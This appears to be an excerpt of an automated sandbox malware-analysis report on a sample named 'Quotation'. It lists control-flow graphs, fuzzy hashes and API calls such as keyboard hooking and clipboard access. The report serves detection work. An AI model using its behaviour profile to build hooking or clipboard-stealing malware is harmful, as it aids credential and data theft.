                                                                                            control_flow_graph 707 3ab4ad60-3ab4ad7e 708 3ab4ad80-3ab4ad83 707->708 709 3ab4ad85-3ab4ad8a 708->709 710 3ab4ad8d-3ab4ad90 708->710 709->710 711 3ab4ad92-3ab4ad9b 710->711 712 3ab4adaa-3ab4adad 710->712 715 3ab4af97-3ab4afa5 711->715 716 3ab4ada1-3ab4ada5 711->716 713 3ab4adbe-3ab4adc1 712->713 714 3ab4adaf-3ab4adb3 712->714 719 3ab4add1-3ab4add4 713->719 720 3ab4adc3-3ab4adcc 713->720 717 3ab4af8c-3ab4af96 714->717 718 3ab4adb9 714->718 724 3ab4afa7-3ab4afce 715->724 725 3ab4af53-3ab4af73 715->725 716->712 718->713 722 3ab4add6-3ab4adf2 719->722 723 3ab4adf7-3ab4adfa 719->723 720->719 722->723 726 3ab4ae14-3ab4ae17 723->726 727 3ab4adfc-3ab4ae0f 723->727 728 3ab4afd0-3ab4afd3 724->728 759 3ab4af7a 725->759 730 3ab4af7d-3ab4af86 726->730 731 3ab4ae1d-3ab4ae20 726->731 727->726 734 3ab4afd5 call 3ab4b2ba 728->734 735 3ab4afe2-3ab4afe5 728->735 730->711 730->717 732 3ab4ae34-3ab4ae36 731->732 733 3ab4ae22-3ab4ae2f 731->733 738 3ab4ae3d-3ab4ae40 732->738 739 3ab4ae38 732->739 733->732 744 3ab4afdb-3ab4afdd 734->744 740 3ab4afe7-3ab4afeb 735->740 741 3ab4aff2-3ab4aff5 735->741 738->708 745 3ab4ae46-3ab4ae6a 738->745 739->738 746 3ab4afed 740->746 747 3ab4b00b-3ab4b046 740->747 749 3ab4aff7-3ab4b001 741->749 750 3ab4b002-3ab4b005 741->750 744->735 745->759 767 3ab4ae70-3ab4ae7f 745->767 746->741 760 3ab4b04c-3ab4b058 747->760 761 3ab4b239-3ab4b24c 747->761 750->747 751 3ab4b26e-3ab4b271 750->751 752 3ab4b294-3ab4b296 751->752 753 3ab4b273-3ab4b28f 751->753 757 3ab4b29d-3ab4b2a0 752->757 758 3ab4b298 752->758 753->752 757->728 764 3ab4b2a6-3ab4b2b0 757->764 758->757 759->730 768 3ab4b078-3ab4b0bc 760->768 769 3ab4b05a-3ab4b073 760->769 763 3ab4b24e 761->763 771 3ab4b24f 763->771 774 3ab4ae97-3ab4aed2 call 3ab46648 767->774 775 3ab4ae81-3ab4ae87 767->775 787 3ab4b0be-3ab4b0d0 768->787 788 3ab4b0d8-3ab4b117 768->788 769->763 771->771 792 3ab4aed4-3ab4aeda 774->792 793 3ab4aeea-3ab4af01 774->793 776 3ab4ae89 775->776 777 3ab4ae8b-3ab4ae8d 775->777 776->774 777->774 787->788 794 3ab4b11d-3ab4b1f8 call 3ab46648 788->794 795 3ab4b1fe-3ab4b213 788->795 796 3ab4aedc 792->796 797 3ab4aede-3ab4aee0 792->797 804 3ab4af03-3ab4af09 793->804 805 3ab4af19-3ab4af2a 793->805 794->795 795->761 796->793 797->793 807 3ab4af0d-3ab4af0f 804->807 808 3ab4af0b 804->808 811 3ab4af42-3ab4af4b 805->811 812 3ab4af2c-3ab4af32 805->812 807->805 808->805 811->725 813 3ab4af34 812->813 814 3ab4af36-3ab4af38 812->814 813->811 814->811
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: DR48$XM$XM
                                                                                            • API String ID: 0-1052184767
                                                                                            • Opcode ID: 24ecab17419762e4529ef5b828091d47a63ca10285e8e175841a7fb813283a7f
                                                                                            • Instruction ID: 74fe5191074bb73df59c64fb54b4ea956605cef1deedcfe833558fdfc06454bb
                                                                                            • Opcode Fuzzy Hash: 24ecab17419762e4529ef5b828091d47a63ca10285e8e175841a7fb813283a7f
                                                                                            • Instruction Fuzzy Hash: B1E19D74B00319CBEB25DBA8D49169EB7B6EF89300F24852EE415EB350DB34DC46EB91

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 833 15a1cc-15a1cf 834 15a1d1-15a1e3 833->834 836 15a1e4-15a1ea 834->836 837 15a16e-15a16f 834->837 838 15a1ec-15a1ef 836->838 844 15a170 837->844 840 15a1f1-15a200 838->840 841 15a20b-15a20e 838->841 851 15a206 840->851 852 15a4cb 840->852 842 15a210-15a219 841->842 843 15a22b-15a22e 841->843 846 15a21f-15a226 842->846 847 15a4ea-15a4f0 842->847 848 15a234-15a237 843->848 849 15a4ce-15a4d7 843->849 844->844 846->843 853 15a26c-15a26f 848->853 854 15a239-15a267 848->854 849->842 850 15a4dd-15a4e7 849->850 851->841 852->849 855 15a271 853->855 856 15a282-15a284 853->856 854->853 923 15a274 call 15a500 855->923 924 15a274 call 15a4f8 855->924 858 15a286 856->858 859 15a28b-15a28e 856->859 858->859 862 15a294 859->862 863 15a1b9-15a1bc 859->863 861 15a27a-15a27d 861->856 867 15a29e-15a2a2 862->867 864 15a1c6-15a1c9 863->864 865 15a1be-15a1c3 863->865 864->838 868 15a1cb 864->868 865->864 931 15a2a5 call 15a500 867->931 932 15a2a5 call 15a4f8 867->932 933 15a2a5 call 15a6b8 867->933 868->833 869 15a2ab-15a2ae 870 15a2ba-15a2bc 869->870 925 15a2bf call 15d990 870->925 926 15a2bf call 15dca0 870->926 927 15a2bf call 15a950 870->927 928 15a2bf call 15a960 870->928 929 15a2bf call 15da18 870->929 930 15a2bf call 15dc68 870->930 871 15a2c5-15a2c7 871->852 872 15a2cd-15a2db 871->872 872->852 874 15a2e1-15a33e 872->874 880 15a344-15a397 874->880 881 15a40f-15a429 874->881 899 15a3b7-15a3da call 1579dc 880->899 900 15a399-15a3b5 880->900 886 15a42b-15a42f 881->886 888 15a431-15a43e 886->888 889 15a440 886->889 890 15a445-15a447 888->890 889->890 892 15a4b3-15a4c5 890->892 893 15a449-15a44b 890->893 892->852 892->874 894 15a44d-15a457 893->894 895 15a459 893->895 898 15a45e-15a460 894->898 895->898 898->892 901 15a462-15a464 898->901 913 15a3dc-15a40d 899->913 900->913 901->892 902 15a466-15a4ac 901->902 902->892 913->886 923->861 924->861 925->871 926->871 927->871 928->871 929->871 930->871 931->869 932->869 933->869
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @148$@148$]
                                                                                            • API String ID: 0-115542519
                                                                                            • Opcode ID: b6171e7b00b168f8bfab653750c6be6cab1e309c228d53fb0d9713ae16d4dc99
                                                                                            • Instruction ID: ac34d5ff4ea217c17e4f6cf86d8b3bbd7f1469af4c637c2ac6d262d6578c930e
                                                                                            • Opcode Fuzzy Hash: b6171e7b00b168f8bfab653750c6be6cab1e309c228d53fb0d9713ae16d4dc99
                                                                                            • Instruction Fuzzy Hash: C8B18234A40204CFDB14DBA8D894AADB7F2FF88311F648569E816EB351DB71DC46CB92
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (\48$(\48
                                                                                            • API String ID: 0-3471131829
                                                                                            • Opcode ID: a2a7201b4d68e76c70cb61da1f66a5f34ebdfce7193f4f633f69bd59a5c83840
                                                                                            • Instruction ID: 55acb304b3de6b72c2ff5844f43d0ff176e37a597c7e3963ce3eaff4b70d6d1a
                                                                                            • Opcode Fuzzy Hash: a2a7201b4d68e76c70cb61da1f66a5f34ebdfce7193f4f633f69bd59a5c83840
                                                                                            • Instruction Fuzzy Hash: 5B029C34A002198FEB54CFA8C49079DB7F6EB89350F24856AE505EB342DB35DD82EB91

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2684 3ab42071-3ab42098 2685 3ab4209a-3ab4209d 2684->2685 2686 3ab420d6-3ab420d9 2685->2686 2687 3ab4209f-3ab420d1 2685->2687 2688 3ab420fc-3ab420fe 2686->2688 2689 3ab420db-3ab420f7 2686->2689 2687->2686 2690 3ab42105-3ab42108 2688->2690 2691 3ab42100 2688->2691 2689->2688 2690->2685 2693 3ab4210a-3ab42119 2690->2693 2691->2690 2696 3ab42183-3ab42198 2693->2696 2697 3ab4211b-3ab42122 2693->2697 2702 3ab42199 2696->2702 2699 3ab42124 2697->2699 2700 3ab42172-3ab42181 2697->2700 2710 3ab42127 call 3ab421c0 2699->2710 2711 3ab42127 call 3ab421ad 2699->2711 2700->2696 2700->2697 2702->2702 2703 3ab4212d-3ab4214b 2708 3ab4214e call 3ab421c0 2703->2708 2709 3ab4214e call 3ab421ad 2703->2709 2706 3ab42154-3ab42157 2707 3ab4215f-3ab4216a 2706->2707 2707->2700 2708->2706 2709->2706 2710->2703 2711->2703
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @148$@148
                                                                                            • API String ID: 0-3693958652
                                                                                            • Opcode ID: aba897855ed017c7a6dc4080ea7412ee5a7e08f78d89075fe608bf242dc22a03
                                                                                            • Instruction ID: 1d58c51d179827e45631cc02053d16fb75ac71a6f9a5b04f350584fbab6fac23
                                                                                            • Opcode Fuzzy Hash: aba897855ed017c7a6dc4080ea7412ee5a7e08f78d89075fe608bf242dc22a03
                                                                                            • Instruction Fuzzy Hash: 25316C35A002159FDB09CFB4C854A9EBBF2FF89300F108519E846E7350EB70AC46EB51

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2712 3ab42080-3ab42098 2713 3ab4209a-3ab4209d 2712->2713 2714 3ab420d6-3ab420d9 2713->2714 2715 3ab4209f-3ab420d1 2713->2715 2716 3ab420fc-3ab420fe 2714->2716 2717 3ab420db-3ab420f7 2714->2717 2715->2714 2718 3ab42105-3ab42108 2716->2718 2719 3ab42100 2716->2719 2717->2716 2718->2713 2721 3ab4210a-3ab42119 2718->2721 2719->2718 2724 3ab42183-3ab42198 2721->2724 2725 3ab4211b-3ab42122 2721->2725 2730 3ab42199 2724->2730 2727 3ab42124 2725->2727 2728 3ab42172-3ab42181 2725->2728 2738 3ab42127 call 3ab421c0 2727->2738 2739 3ab42127 call 3ab421ad 2727->2739 2728->2724 2728->2725 2730->2730 2731 3ab4212d-3ab4214b 2736 3ab4214e call 3ab421c0 2731->2736 2737 3ab4214e call 3ab421ad 2731->2737 2734 3ab42154-3ab42157 2735 3ab4215f-3ab4216a 2734->2735 2735->2728 2736->2734 2737->2734 2738->2731 2739->2731
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @148$@148
                                                                                            • API String ID: 0-3693958652
                                                                                            • Opcode ID: 6f65a862e9b8d540f9ecce1797b63776958ea83998b8fb2c04d991bcc2e76610
                                                                                            • Instruction ID: 2e929579d2eb3e15443ba9b8986609df908538eb01afbbf8fd1a24636ad509f9
                                                                                            • Opcode Fuzzy Hash: 6f65a862e9b8d540f9ecce1797b63776958ea83998b8fb2c04d991bcc2e76610
                                                                                            • Instruction Fuzzy Hash: 6B316135E002199BDB09DFA4C854A9EBBF6FF89340F508519E946E7350EB70AC42EB91

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2740 15a073-15a098 2741 15a09a-15a09d 2740->2741 2742 15a0c0-15a0c3 2741->2742 2743 15a09f-15a0bb 2741->2743 2744 15a0c5-15a0f7 2742->2744 2745 15a0fc-15a0fe 2742->2745 2743->2742 2744->2745 2748 15a105-15a108 2745->2748 2749 15a100 2745->2749 2748->2741 2750 15a10a-15a119 2748->2750 2749->2748 2753 15a11b-15a122 2750->2753 2754 15a15a-15a16f 2750->2754 2755 15a124-15a12a 2753->2755 2756 15a149-15a158 2753->2756 2760 15a170 2754->2760 2761 15a130 call 15a2b0 2755->2761 2762 15a130 call 15a1cc 2755->2762 2763 15a130 call 15a4ae 2755->2763 2756->2753 2756->2754 2758 15a136-15a141 2758->2756 2760->2760 2761->2758 2762->2758 2763->2758
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @148$@148
                                                                                            • API String ID: 0-3693958652
                                                                                            • Opcode ID: 46f0e386c5e15efd98bfb4da41829bfa52c196f2489a30d596f1c661cc3cb348
                                                                                            • Instruction ID: d1623a2eb6c7f854cda88ce632339733c5d663b690ed4ff7d3cca37b0f1177e6
                                                                                            • Opcode Fuzzy Hash: 46f0e386c5e15efd98bfb4da41829bfa52c196f2489a30d596f1c661cc3cb348
                                                                                            • Instruction Fuzzy Hash: 9E317C70E00609DFDB15CF65D890A9EFBB2BF89301F50861AE815AB351DB71984ACB92
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @148$@148
                                                                                            • API String ID: 0-3693958652
                                                                                            • Opcode ID: c7851f9b7b0e826c4dd9a4b511401ce0ffe311e3bdde1b913c98bb757fc43e30
                                                                                            • Instruction ID: c906988b0f763f6243a222befa6ddbb5c64e1b142bb7775cf8b13990a396cc91
                                                                                            • Opcode Fuzzy Hash: c7851f9b7b0e826c4dd9a4b511401ce0ffe311e3bdde1b913c98bb757fc43e30
                                                                                            • Instruction Fuzzy Hash: 2F217E30A10609DBCB15CFA9C890A9EF7B6BF89300F50861AE815BB341DB709C46CB92
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: D048$D048
                                                                                            • API String ID: 0-3284924686
                                                                                            • Opcode ID: 99dd41f656a452fd687958dac9231f0c5a47b1c484e6307859b13e52910e290e
                                                                                            • Instruction ID: a001d3a083f0e1be998d2abf046ec125a647e9052f4c5c980711131bbd39e3a6
                                                                                            • Opcode Fuzzy Hash: 99dd41f656a452fd687958dac9231f0c5a47b1c484e6307859b13e52910e290e
                                                                                            • Instruction Fuzzy Hash: F7216031E10305DFCB15CFA4D45059EBBB2BF85700F60861AE825FB390EB75984ACB52
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: D048$D048
                                                                                            • API String ID: 0-3284924686
                                                                                            • Opcode ID: ce2c5150f93741f345420fb615241cb5f38ef2b9649dfb7bbeed1de9c6100305
                                                                                            • Instruction ID: 3b3d5523f0f4335cfee6eee290d0a19954685e01a2c09ac2e0d014fa4473685f
                                                                                            • Opcode Fuzzy Hash: ce2c5150f93741f345420fb615241cb5f38ef2b9649dfb7bbeed1de9c6100305
                                                                                            • Instruction Fuzzy Hash: BA213030E10205DBCB19CFA4D45099EFBB2BF89311F60861AE826FB390DB7498498B51
                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B67248A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: e2db46bdcca7dadb6bfb6dd30ada19ef16451e2ed2a3307c2e797ce5468b1a33
                                                                                            • Instruction ID: 3e8531cf44e5bc4e45931c66950bccffbd131807a95c91fd7d1853c24f70d90d
                                                                                            • Opcode Fuzzy Hash: e2db46bdcca7dadb6bfb6dd30ada19ef16451e2ed2a3307c2e797ce5468b1a33
                                                                                            • Instruction Fuzzy Hash: AA51CFB5D003499FEB14CFA9D880ADEBFB5BF49310F24812AE819AB211D7749885CF91
                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B67248A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: 0a4537698a63ccd1c063eb3bd19fff26623d62bca1c68a11c09a6a889ee7ecff
                                                                                            • Instruction ID: fadad5ae5a9c6bfc7a11a4e7556ecf6922d27ab287605c865dc6e40bb39cc606
                                                                                            • Opcode Fuzzy Hash: 0a4537698a63ccd1c063eb3bd19fff26623d62bca1c68a11c09a6a889ee7ecff
                                                                                            • Instruction Fuzzy Hash: 7341C0B5D00309DFEB14CF9AD880ADEFBB5BF48310F20812AE419AB211D774A885CF91
                                                                                            APIs
                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 3B677029
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallProcWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2714655100-0
                                                                                            • Opcode ID: bada41751851693fe46a50dd76eff143d1af6f869ee6beb5113ee0651f2e8265
                                                                                            • Instruction ID: ea025202b03132d0f34f257f2069e261a5094fd4c8789b0c7087f64d4574042c
                                                                                            • Opcode Fuzzy Hash: bada41751851693fe46a50dd76eff143d1af6f869ee6beb5113ee0651f2e8265
                                                                                            • Instruction Fuzzy Hash: 5A4149B8A00309CFDB00DF95C489AAABBF5FF88314F24C459E518A7321D775A941CFA1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Clipboard
                                                                                            • String ID:
                                                                                            • API String ID: 220874293-0
                                                                                            • Opcode ID: 8803770c3dead743239ac5ddd0ccd1bf69ceb595076180a1ef8c7a30b04d0a35
                                                                                            • Instruction ID: dce8a0f92375e8c4b9571b8074683f08e3b4e1307f079f7c263db5f9a1031074
                                                                                            • Opcode Fuzzy Hash: 8803770c3dead743239ac5ddd0ccd1bf69ceb595076180a1ef8c7a30b04d0a35
                                                                                            • Instruction Fuzzy Hash: 5C31F2B0902248DFEB10DFA9C585BEDBBB1AF48314F24805AE404BB391DB75A845CF51
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Clipboard
                                                                                            • String ID:
                                                                                            • API String ID: 220874293-0
                                                                                            • Opcode ID: 0d30f293b1140e80a6a41806fd9f6e0985720c8bab484c2d2c0db0854ba15331
                                                                                            • Instruction ID: f11c45c3a3a642aa67094ac421a5a57956b660481ad38f2c6140c38cac31ebe3
                                                                                            • Opcode Fuzzy Hash: 0d30f293b1140e80a6a41806fd9f6e0985720c8bab484c2d2c0db0854ba15331
                                                                                            • Instruction Fuzzy Hash: 8631E0B0902308DFEB10DF99C985BEEBBF5AF48314F24805AE404BB391DB74A845CB65
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3B67615F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: d45b374f39e83bedc5bcecc4f48d93f0c96538771d99fd0af4475e3c9c752d06
                                                                                            • Instruction ID: daafe59cc1308df3619ade072922269052772dc7b8077bd9fce6f003212ebfd0
                                                                                            • Opcode Fuzzy Hash: d45b374f39e83bedc5bcecc4f48d93f0c96538771d99fd0af4475e3c9c752d06
                                                                                            • Instruction Fuzzy Hash: 2C21D4B59002499FDB10CFA9D584ADEBBF4EB48310F14841AE954A7311D374A940CF61
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3B67615F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: bcbf46eba49be8b32fb9ba901663aac027bf2405c59c9d5ea1e18e316b34ac5c
                                                                                            • Instruction ID: c64be5a5cca7dfde7cad7a90bcaaaa55183eab47862d407dbb38bab93c378819
                                                                                            • Opcode Fuzzy Hash: bcbf46eba49be8b32fb9ba901663aac027bf2405c59c9d5ea1e18e316b34ac5c
                                                                                            • Instruction Fuzzy Hash: 1821F5B5900309AFDB10CFAAD984ADEFBF4EF48320F14801AE954A3311D378A940CF61
                                                                                            APIs
                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3B67986B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: HookWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2559412058-0
                                                                                            • Opcode ID: 5360424a5d87be218d8a23239bb5364fa0edffd530e6770d2f60cc37d6369570
                                                                                            • Instruction ID: 371bc61e51c9a3d29a4ccc555b9dad3c9f15e9cede30524789d0b70b0f936cf4
                                                                                            • Opcode Fuzzy Hash: 5360424a5d87be218d8a23239bb5364fa0edffd530e6770d2f60cc37d6369570
                                                                                            • Instruction Fuzzy Hash: 222115B5D002099FDB14CFAAD945BEEBBF5AF88310F24842AD459A7250C774A944CFA1
                                                                                            APIs
                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3B67986B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: HookWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2559412058-0
                                                                                            • Opcode ID: 9997802bc79f37429f6f60f43bd91d580d33f85e5d85d3cb19ba013d636647ca
                                                                                            • Instruction ID: b779eb5665b01af6b4d84709b56a0c7c30b3635b8b2e37856bed80252287874f
                                                                                            • Opcode Fuzzy Hash: 9997802bc79f37429f6f60f43bd91d580d33f85e5d85d3cb19ba013d636647ca
                                                                                            • Instruction Fuzzy Hash: 122124B5D002099FDB04DFAAD844BEEFBF4EF88320F10842AD458A7290D774A944CFA1
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,3B677275), ref: 3B6772FF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 0eeac090ef0ee84ed59cdb51ff8b14cf1997ec533f30ed22627eed5c847f62cc
                                                                                            • Instruction ID: f1d525f3841a14b49034668976e3b630464886a6debeff0f6b678f0a27f5f1b8
                                                                                            • Opcode Fuzzy Hash: 0eeac090ef0ee84ed59cdb51ff8b14cf1997ec533f30ed22627eed5c847f62cc
                                                                                            • Instruction Fuzzy Hash: 251133B59003488FDB10DF9AD445BAEBBF4EF48320F20841AD928A7301D378A940CFA5
                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 3B677BBD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize
                                                                                            • String ID:
                                                                                            • API String ID: 2538663250-0
                                                                                            • Opcode ID: 65724d05d5a0c9763c6c85365bbb54236170e25033ab97d066cce066cc212e8b
                                                                                            • Instruction ID: b8190e284949945f2a2e7ebee677a9f81988debbfdbdb80dd25db2479403978e
                                                                                            • Opcode Fuzzy Hash: 65724d05d5a0c9763c6c85365bbb54236170e25033ab97d066cce066cc212e8b
                                                                                            • Instruction Fuzzy Hash: CB1130B5800308CFDB10DFAAD485B9EBBF4EB48320F20846AD558A3300D378A940CFA5
                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 3B677BBD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize
                                                                                            • String ID:
                                                                                            • API String ID: 2538663250-0
                                                                                            • Opcode ID: 3dba206cdb28a55cc3e26cbc0a8ad82f0ce3ec21c979d9922f8b85d1c74d61a6
                                                                                            • Instruction ID: 2182903496ed80e49d37f201e2bd51344f1fa674443cb0bae80e783f486b6f02
                                                                                            • Opcode Fuzzy Hash: 3dba206cdb28a55cc3e26cbc0a8ad82f0ce3ec21c979d9922f8b85d1c74d61a6
                                                                                            • Instruction Fuzzy Hash: B51112B5900349CFDB20DFAAD585BDEBBF4AF48320F20845AD458A3710D378A544CFA5
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,3B677275), ref: 3B6772FF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: f7c423a5e04fefc347983242540b2587613918d53da530e721310c1832f2cbe2
                                                                                            • Instruction ID: 48b3debfd39a478184ed41b9dd80573a22834c8f28aa5f10a499170d94b7e2a9
